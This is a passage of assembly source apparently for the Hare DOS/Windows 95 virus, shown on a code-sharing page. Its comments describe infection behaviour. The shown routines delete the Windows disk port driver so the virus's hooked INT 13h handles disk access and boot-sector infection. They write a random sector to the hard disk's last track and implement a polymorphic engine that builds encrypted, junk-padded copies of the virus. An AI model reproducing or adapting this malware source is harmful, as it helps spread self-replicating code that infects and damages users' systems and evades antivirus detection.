📄 hare.asm
字号:
MOV CX, BX
INC DI
MOV AL,ES:[DI]
CMP AL, '\'
JNE LOC_66
INC DI
MOV SI, DI
MOV DI, OFFSET FileName2
DEC CX
DEC BX
CLD
PUSH CS
POP ES
REP MOVSB
CALL SUB_14
RETN
LOC_66:
MOV BX, 0Ah
PUSH CS
POP ES
RETN
FileName1 DB 'DUM1.EXE.EXE', 0
FileName2 DB 'DUM1.EXECOME', 0
Command_Com DB 'COMMAND'
Port_Driver DB '\SYSTEM\IOSUBSYS\HSFLOP.PDR', 0
; Searches the program environment to find a 'WIN'-string. This matches
; normally to either WINBOOTDIR or WINDOWS, thus the Windows directory.
; It then appends the path '\SYSTEM\IOSUBSYS\HDFLOP.PDR' to the found
; directoryname. The file HSFLOP.PDR handles the port-level-access to disks,
; without it Windows needs to use the slow INT 13h (which the virus has
; hooked). Hare does this to also infect bootsectors under Windows 95/NT.
Del_PortDriver:
PUSH DS
PUSH DX
XOR DI, DI
Find_String:
MOV CX, 0FFFFh
MOV AH, 62h ; Get PSP.
INT 21h
MOV ES, BX
MOV ES, ES:[2Ch] ; ES = Program's environment-
CLD ; block (PATH, SET, etc).
Get_Next_String:
MOV AL, 0
REPNE SCASB ; Find end of ASCIIZ-string.
MOV AX, ES:[DI] ; Get first word.
OR AL, AL ; No settings?
JZ Exit_Del_Driver ; Then exit routine.
AND AX, 1101111111011111b ; Convert to uppercase.
CMP AX, 'IW' ; WINBOOTDIR/WINDOWS?
JNE Get_Next_String
MOV AL, ES:[DI+2] ; Get third character.
AND AL, 11011111b ; To uppercase.
CMP AL, 'N' ; Have we found WIN ?
JNE Get_Next_String
MOV AL, '=' ; Value.
REPNE SCASB ; Find '='.
JCXZ Exit_Del_Driver ; Not found?
MOV SI, DI
MOV BX, DI
MOV DI, OFFSET Buffer
MOV DX, DI
PUSH ES
POP DS
PUSH CS
POP ES
; This copies the string found above to our buffer.
Copy_Byte:
LODSB ; Copy byte to our buffer.
STOSB
OR AL, AL ; End reached?
JNZ Copy_Byte ; No, then continue copy.
DEC DI
PUSH CS
POP DS
MOV SI, OFFSET Port_Driver ; Append path to Windows-dir.
MOV CX, 28
REP MOVSB
MOV AH, 41h ; Delete portdriver.
CALL Traced_i21h
JNC Exit_Del_Driver
CMP AL, 02h ; File not found?
; (Wrong string fetched?)
MOV DI, BX
JZ Find_String
STC
Exit_Del_Driver:
POP DX
POP DS
RETN
DATA_70 DB 0
DB 1Ah, 02h ; Read real-time clock.
DB 1Ah, 04h ; Read date from real-time clock.
DB 1Ah, 03h ; Set real-time clock.
DB 10h, 08h ; Read character and attribute.
DB 10h, 0Fh ; Get current display mode.
DB 10h, 0Bh ; Set color palette.
DB 21h, 0Dh ; Reset disk.
DB 21h, 18h ; Reserved.
DB 21h, 19h ; Get default drive.
DB '!*!,!0!M!Q!T!b!' ; AND opcodes.
DB 0Bh, 21h, 0Dh, 21h
Int_Table:
INT 2Bh
INT 2Ch
INT 2Dh
INT 28h
INT 1Ch ; This is bad programming!
INT 08h ; This 1 2!
INT 0Ah
INT 0Bh
INT 0Ch
INT 0Dh
INT 0Fh
INT 0Eh
INT 70h
INT 71h
INT 72h
INT 73h
INT 74h
INT 75h
INT 76h ; Can cause problems 4 example wit MegaStealth.
INT 77h
INT 01h
INT 03h ; 1 byte breakpoint.
INT 03h
PushPop_Pairs:
PUSH AX
POP AX
PUSH BX
POP BX
PUSH CX
POP CX
PUSH DX
POP DX
PUSH DI
POP DI
PUSH SI
POP SI
PUSH BP
POP BP
PUSH DS
POP DS
PUSH ES
POP ES
PUSH SS
POP SS
Random DW 0
DATA_74 DB 1Eh
SUB_17:
CALL Get_Random_Poly ; Get random# in AX.
TEST AH, 00010000b ; 1/8 chance.
JZ LOC_74
CMP BL, 02h
JE LOC_72
CMP BL, 04h
JE LOC_73
JMP LOC_74
LOC_72:
ADD AL, 64
JNC LOC_72
AND AL, 11111110b ;
CMP AL, DATA_74
JE SUB_17
MOV DATA_74, AL
PUSH SI
CBW
XCHG BX, AX
MOV SI, OFFSET Int_Table
MOV AX, [BX+SI]
POP SI
MOV BL, 02h
RETN
LOC_73:
ADD AL, 38
JNC LOC_73
AND AL, 11111110b
CMP AL, DATA_74
JE SUB_17
MOV DATA_74, AL
PUSH SI
CBW
XCHG BX, AX
MOV SI, OFFSET DATA_70
MOV AH, [BX+SI]
MOV DH, [BX+SI+1]
MOV AL, 0B4h
MOV DL, 0CDh
POP SI
MOV BL, 04h
RETN
LOC_74:
MOV BL, 00h
RETN
SUB_18:
MOV BP, 03h
LOC_75:
DEC BP
JZ LOC_RET_78
CALL SUB_17
ADD CL, BL
CMP BL, 2
JB LOC_77
JA LOC_76
STOSW
JMP LOC_75
LOC_76:
STOSW
MOV AX, DX
STOSW
LOC_77:
JMP LOC_75
LOC_RET_78:
RETN
;
;
;
; Returns: BX = Random number 0 - 2.
Get_Ran_3:
XOR BX, BX
LOC_79:
PUSH AX
CALL Get_Random_Poly
MOV BL, AL
POP AX
MOV AL, BL
OR BL, BL
JZ LOC_79
AND BL, 00000011b ; 0 - 3.
CMP BL, 3 ; 0 - 2.
JB LOC_RET_80
JMP LOC_79
LOC_RET_80:
RETN
Check_Poly_Sector:
PUSH CS
PUSH CS
POP ES
POP DS
MOV AH, 08h ; Get disk drive parameters
MOV DL, 80h ; of 1st harddisk.
INT 13h
MOV BX, OFFSET Poly_Sector
MOV AX, 0201h
INC CH ; Last track of harddisk.
DEC DH ;
DEC DH
MOV CL, 01h ; 1st sector.
MOV DL, 80h
INT 13h
JC Exit_Poly_Check
CALL Get_Random
AND AL, 00001111b ; 0 - 15.
CMP AL, 7
JE Gen_Poly_Sector
CMP [BX], 0CCDDh ; Polysector already present?
JE Exit_Poly_Check
Gen_Poly_Sector:
MOV CX, 256 ; 256 words.
MOV DI, BX
Store_Random:
CALL Get_Random
ADD AX, [DI-2] ; Add previous value.
MOV [DI], AX
INC DI
INC DI
LOOP Store_Random
MOV [BX], 0CCDDh ; Polysector signature.
LOC_83:
MOV AH, 08h ; Get disk drive parameters.
MOV DL, 80h
INT 13h
MOV BX, OFFSET Poly_Sector ; Write polysector to disk.
MOV AX, 0301h
INC CH
DEC DH
DEC DH
MOV CL, 01h
MOV DL, 80h
INT 13h
JC LOC_85
Exit_Poly_Check:
RETN
LOC_85:
MOV AX, 440Dh
MOV BX, 180h
MOV CX, 84Bh
INT 21h ; DOS Services ah=function 44h
; IOctl-D block device control
; bl=drive, cx=category/type
; ds:dx ptr to parameter block
JMP LOC_83
;
; Gets a random number from the polymorphic sector.
; Returns: AX = Random number.
;
Get_Random_Poly:
PUSH BX
MOV BX, CS:Poly_Sector
CMP BX, 512
JB LOC_86
AND BX, 00000001b ; 0 - 1.
XOR BL, 00000001b ; Flip.
LOC_86:
ADD BX, 2 ; Next word.
MOV CS:Poly_Sector, BX
MOV AX, CS:[Poly_Sector+BX]
POP BX
RETN
;
; Return: AX = Random value (1 - 65535).
;
Get_Random:
XOR AL, AL
OUT 43h, AL ; port 43H, 8253 timer control
; al = 0, latch timer0 count
JMP $+2 ; Delay for I/O.
IN AL, 40h
MOV AH, AL
IN AL, 40h
XOR AL, AH
XCHG AL, AH
PUSH CX
MOV CL, AH
AND CL, 00001111b
ROL AX, CL
MOV CX, AX
AND CX, 0000011111111111b
Delay_Loop:
JMP $+2
NOP
LOOP Delay_Loop
POP CX
XOR CS:Random, AX
ADD AX, CS:Random
OR AH, AH
JZ Get_Random
OR AL, AL
JZ Get_Random
RETN
Poly_Engine:
PUSH SI
PUSH BX ; Filehandle.
CLD
MOV Poly_Sector, 0
XOR SI, SI
MOV DI, OFFSET Undoc
MOV DATA_77, 1C6Ah
MOV AX, Host_Entrypoint
MOV DATA_84, AX
CALL Get_Ran_3
MOV AL, [BX+Encr_Methods]
MOV AH, 0E0h
MOV word ptr Poke1, AX
MOV word ptr Shit3, AX
XOR BL, 03h
MOV AL, Encr_Methods[BX]
MOV Shit2, AL
CALL Get_Random_Poly
MOV DATA_94, AL
MOV Key_3, AL
MOV DATA_82, AH
POP BX
PUSH BX
MOV word ptr Decrypt_2, 0F72Eh
MOV BYTE PTR Key_2, 15h
MOV CX, 14h
LOCLOOP_89:
LODSB ; String [si] to al
Shit3:
;* SUB AL,AH
DB 28H,0E0H ; Fixup - byte match
STOSB ; Store al to es:[di]
LOOP LOCLOOP_89 ; Loop if cx > 0
MOV CX, 1ECh
LOCLOOP_90:
LODSB ; String [si] to al
CMP SI,1A3H
JB LOC_91
XCHG DATA_94, AH
XOR AL, AH
ADD AH, 01h
XCHG DATA_94, AH
LOC_91:
NOT AL
Poke1:
;* SUB AL,AH
DB 28H,0E0H ; Fixup - byte match
STOSB
LOOP LOCLOOP_90
CALL SUB_38
JC LOC_94
MOV CX,DATA_77
JCXZ LOC_93 ; Jump if cx=0
SUB CX, 200h
JC LOC_92
MOV DATA_77, CX
MOV CX, 200h
JMP LOCLOOP_90
LOC_92:
ADD CX, 512
MOV DATA_77, 0
MOV DX, CX
JMP LOCLOOP_90
LOC_93:
CALL SUB_39
CALL SUB_31
CALL SUB_24
MOV DX, 1F6Ah
MOV AH, 40h
ADD CX, 11h
NOP
CALL Traced_i21h
CLC
LOC_94:
POP BX
POP SI
RETN
SUB_24:
PUSH BX
PUSH BP
MOV SI, OFFSET Undoc
MOV DI, OFFSET Drew1
XOR CX, CX
CALL Make_Clear_Flags
MOV BL, 04h
CALL SUB_18
CALL SUB_34
CALL SUB_36
CALL Make_Uncon_JMP
CALL SUB_25
CALL Make_Uncon_JMP
CALL SUB_25
CALL Make_Uncon_JMP
CALL SUB_25
CALL Make_Uncon_JMP
MOV BL, 02h
CALL SUB_18
CALL Make_Uncon_JMP
CALL Get_Random_Poly
CMP AH, 128
JB LOC_95
MOVSB
JMP LOC_96
LOC_95:
OR Flags, 00010000b
SUB CL, 01h
INC SI
LOC_96:
CALL Make_Uncon_JMP
CALL SUB_28
MOV CH,CL
MOV BL, 2
CALL SUB_18
CALL Make_Uncon_JMP
MOVSW
MOVSB
CALL Make_Uncon_JMP
CALL SUB_33
MOV BL,2
CALL SUB_18
CALL SUB_27
MOV BL,2
CALL SUB_18
CALL Make_Uncon_JMP
CALL SUB_26
MOV BL,2
CALL SUB_18
CALL Make_Uncon_JMP
MOV AL,CL
SUB AL,CH
MOV CH,AL
LODSW ; String [si] to ax
SUB AH, CH
STOSW
MOV BL, 02h
CALL SUB_18
CALL Make_Uncon_JMP
CALL SUB_30
CALL Get_Random_Poly
AND AL, 00000111b
ADD CL, AL
MOV CH, 00h
CMP Host_Type, CH
JE LOC_97
ADD File_Mod512, CX
CMP File_Mod512, 512
JB LOC_97
INC Byte_Pages ; Rounding.
SUB File_Mod512, 512
JNZ LOC_97
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -